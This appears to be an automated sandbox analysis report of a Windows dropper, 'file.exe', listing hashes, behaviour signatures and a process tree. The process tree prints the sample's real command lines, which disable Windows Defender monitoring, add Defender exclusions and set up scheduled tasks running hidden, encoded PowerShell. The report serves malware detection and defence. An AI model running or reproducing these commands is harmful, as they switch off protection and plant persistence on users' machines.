Analysis
-
max time kernel
145s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20231025-en -
resource tags
arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system -
submitted
07-12-2023 19:54
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231025-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
fca38988f95f893355d9f020a1f71ee3
-
SHA1
c3b9647467c9b434ba6a796c05f27a350c6fd8c8
-
SHA256
aae089ffc7f6e35506106b454fd2edfc4941467e06f76d173f9cbd9e02110031
-
SHA512
266566c7ec8057122c5ca08dc00c16c5c9e73ea552c4c3fbc5a41c56e2fb2852b8dbc1dd2161980609d750cc0d120f2d074445585cbe5bf33c6beb2ed5bfb36c
-
SSDEEP
196608:91OUHIbPGg9PaDD9zATbAXqXWAXz2v/tBDPRb7S:3OUIb+Iiwk6mPv/tVRq
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bJazgiTXFJUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\sUklQelueKqzsVVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bJazgiTXFJUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ycMZCyUlVfbU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yczsUHdtPuMxC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\sUklQelueKqzsVVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icEyDogKU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yczsUHdtPuMxC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PhaWElAePoHhBdUTFeR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ycMZCyUlVfbU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icEyDogKU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PhaWElAePoHhBdUTFeR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Executes dropped EXE 3 IoCs
Processes:
Install.exeInstall.exeDzWmOru.exepid process 1940 Install.exe 2328 Install.exe 1328 DzWmOru.exe -
Loads dropped DLL 8 IoCs
Processes:
file.exeInstall.exeInstall.exepid process 2472 file.exe 1940 Install.exe 1940 Install.exe 1940 Install.exe 1940 Install.exe 2328 Install.exe 2328 Install.exe 2328 Install.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 8 IoCs
Processes:
powershell.EXEpowershell.EXEInstall.exepowershell.EXEDzWmOru.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol DzWmOru.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini DzWmOru.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol DzWmOru.exe -
Drops file in Windows directory 1 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\bQrKcOXclPyMmQgfTY.job conhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1972 schtasks.exe 2208 schtasks.exe 1660 schtasks.exe 2308 schtasks.exe 1944 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 9 IoCs
Processes:
wscript.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEpid process 2940 powershell.EXE 2940 powershell.EXE 2940 powershell.EXE 2096 powershell.EXE 2096 powershell.EXE 2096 powershell.EXE 1012 powershell.EXE 1012 powershell.EXE 1012 powershell.EXE 1640 powershell.EXE 1640 powershell.EXE 1640 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEdescription pid process Token: SeDebugPrivilege 2940 powershell.EXE Token: SeDebugPrivilege 2096 powershell.EXE Token: SeDebugPrivilege 1012 powershell.EXE Token: SeDebugPrivilege 1640 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exereg.execmd.execmd.exedescription pid process target process PID 2472 wrote to memory of 1940 2472 file.exe Install.exe PID 2472 wrote to memory of 1940 2472 file.exe Install.exe PID 2472 wrote to memory of 1940 2472 file.exe Install.exe PID 2472 wrote to memory of 1940 2472 file.exe Install.exe PID 2472 wrote to memory of 1940 2472 file.exe Install.exe PID 2472 wrote to memory of 1940 2472 file.exe Install.exe PID 2472 wrote to memory of 1940 2472 file.exe Install.exe PID 1940 wrote to memory of 2328 1940 Install.exe Install.exe PID 1940 wrote to memory of 2328 1940 Install.exe Install.exe PID 1940 wrote to memory of 2328 1940 Install.exe Install.exe PID 1940 wrote to memory of 2328 1940 Install.exe Install.exe PID 1940 wrote to memory of 2328 1940 Install.exe Install.exe PID 1940 wrote to memory of 2328 1940 Install.exe Install.exe PID 1940 wrote to memory of 2328 1940 Install.exe Install.exe PID 2328 wrote to memory of 2960 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2960 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2960 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2960 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2960 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2960 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2960 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2776 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2776 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2776 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2776 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2776 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2776 2328 Install.exe forfiles.exe PID 2328 wrote to memory of 2776 2328 Install.exe forfiles.exe PID 2776 wrote to memory of 2640 2776 forfiles.exe cmd.exe PID 2776 wrote to memory of 2640 2776 forfiles.exe cmd.exe PID 2776 wrote to memory of 2640 2776 forfiles.exe cmd.exe PID 2776 wrote to memory of 2640 2776 forfiles.exe cmd.exe PID 2776 wrote to memory of 2640 2776 forfiles.exe cmd.exe PID 2776 wrote to memory of 2640 2776 forfiles.exe cmd.exe PID 2776 wrote to memory of 2640 2776 forfiles.exe cmd.exe PID 2960 wrote to memory of 2528 2960 reg.exe cmd.exe PID 2960 wrote to memory of 2528 2960 reg.exe cmd.exe PID 2960 wrote to memory of 2528 2960 reg.exe cmd.exe PID 2960 wrote to memory of 2528 2960 reg.exe cmd.exe PID 2960 wrote to memory of 2528 2960 reg.exe cmd.exe PID 2960 wrote to memory of 2528 2960 reg.exe cmd.exe PID 2960 wrote to memory of 2528 2960 reg.exe cmd.exe PID 2640 wrote to memory of 2544 2640 cmd.exe reg.exe PID 2640 wrote to memory of 2544 2640 cmd.exe reg.exe PID 2640 wrote to memory of 2544 2640 cmd.exe reg.exe PID 2640 wrote to memory of 2544 2640 cmd.exe reg.exe PID 2640 wrote to memory of 2544 2640 cmd.exe reg.exe PID 2640 wrote to memory of 2544 2640 cmd.exe reg.exe PID 2640 wrote to memory of 2544 2640 cmd.exe reg.exe PID 2528 wrote to memory of 2524 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2524 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2524 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2524 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2524 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2524 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2524 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2560 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2560 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2560 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2560 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2560 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2560 2528 cmd.exe reg.exe PID 2528 wrote to memory of 2560 2528 cmd.exe reg.exe PID 2640 wrote to memory of 2592 2640 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\7zS3063.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\7zS337F.tmp\Install.exe.\Install.exe /bAdPdidLC "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵PID:2960
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2560
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2524
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2544
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2592
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTzSIkRJV" /SC once /ST 10:35:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1972 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTzSIkRJV"4⤵PID:2876
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTzSIkRJV"4⤵PID:2272
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bQrKcOXclPyMmQgfTY" /SC once /ST 19:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\DzWmOru.exe\" BX /MIsite_idEEz 525403 /S" /V1 /F4⤵
- Creates scheduled task(s)
PID:2208
-
C:\Windows\system32\taskeng.exetaskeng.exe {C59F5D66-4F4A-4761-9BF5-076C7891D40D} S-1-5-21-1861898231-3446828954-4278112889-1000:PTZSFKIF\Admin:Interactive:[1]1⤵PID:1952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2840
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1012 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2968
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2832
-
C:\Windows\system32\taskeng.exetaskeng.exe {6DCD38A8-46D1-4E22-9A32-2D3B55ED72CA} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1964
-
C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\DzWmOru.exeC:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\DzWmOru.exe BX /MIsite_idEEz 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1328 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gujyilwym" /SC once /ST 12:52:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1660 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gujyilwym"3⤵PID:2920
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gujyilwym"3⤵PID:2384
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1604
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1624 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNHXaQpcn" /SC once /ST 13:11:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2308 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1304
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNHXaQpcn"3⤵PID:696
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNHXaQpcn"3⤵PID:1608
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:323⤵PID:2232
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:820 -
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\szdKxxrFMiVXCdXj\RVlUOiQv\jeLVBvLoNRhGIpTH.wsf"3⤵PID:2552
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\szdKxxrFMiVXCdXj\RVlUOiQv\jeLVBvLoNRhGIpTH.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2576 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2904 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3064 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3060 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:324⤵PID:296
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵PID:984
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:644⤵PID:1604
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:644⤵PID:1924
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:324⤵PID:1740
-
